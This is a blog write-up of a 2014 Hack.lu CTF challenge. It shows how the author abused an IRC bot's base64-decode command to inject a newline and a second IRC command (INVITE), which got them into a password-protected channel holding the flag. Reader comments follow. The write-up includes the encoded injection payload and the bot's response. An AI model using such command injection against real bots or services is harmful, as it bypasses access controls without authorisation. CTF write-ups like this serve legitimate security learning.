Hack.lu CTF 2014 misc-200: Barmixing-Bot

There’s a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it’s involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!

Legend:
hhby1 – me, barmixing-bot – barmixing-bot :)

hhby1: !help
barmixing-bot: Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list

hhby1: !status
barmixing-bot:
My name is barmixing-bot, my uptime is 0 hours 40 minutes and 33 seconds. I am on the following channels: #hacklu-saloon, #hacklu-secret-channel, #new_chan2

So, we need to connect to a passworded channel #hacklu-secret-channel. To do this, you should either find the password, or ask for a bot that he invited us. I chose the second way :) IRC protocol based on one-line commands, so we can’t send multiline messages or something like that. We can inject one more command by forcing bot to send \n character to the server and !base64d command can help us.

➜  ~  echo -e "hello\nINVITE hhby1 #hacklu-secret-channel\n" | base64
aGVsbG8KSU5WSVRFIGhoYnkxICNoYWNrbHUtc2VjcmV0LWNoYW5uZWwKCg==

hhby1: !base64d aGVsbG8KSU5WSVRFIGhoYnkxICNoYWNrbHUtc2VjcmV0LWNoYW5uZWwKCg==
barmixing-bot: hello
* barmixing-bot invites you to channel #hacklu-secret-channel

Topic for #hacklu-secret-channel: FLAG: GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH
Topic for #hacklu-secret-channel set by freddyb!~freddyb@fluxfingers.syssec.ruhr-uni-bochum.de at 12:41:54 on 10/18/14

2 Comments

  1. Fuhgeddaboudit

    24.10.2014 at 05:10

    that’s a really nice solution, however my IRC client just show the topic for #hacklu-secret-channel with /LIST command :)

    ping me please i want to join your team for the next CTF

    • Alexey Kaminsky

      24.10.2014 at 08:35

      That’s because +s flag unset after ctf :-)
      Okay, I’ll ping you

Leave a Reply

Your email address will not be published.

© 2017 akaminsky.net

Theme by Anders NorénUp ↑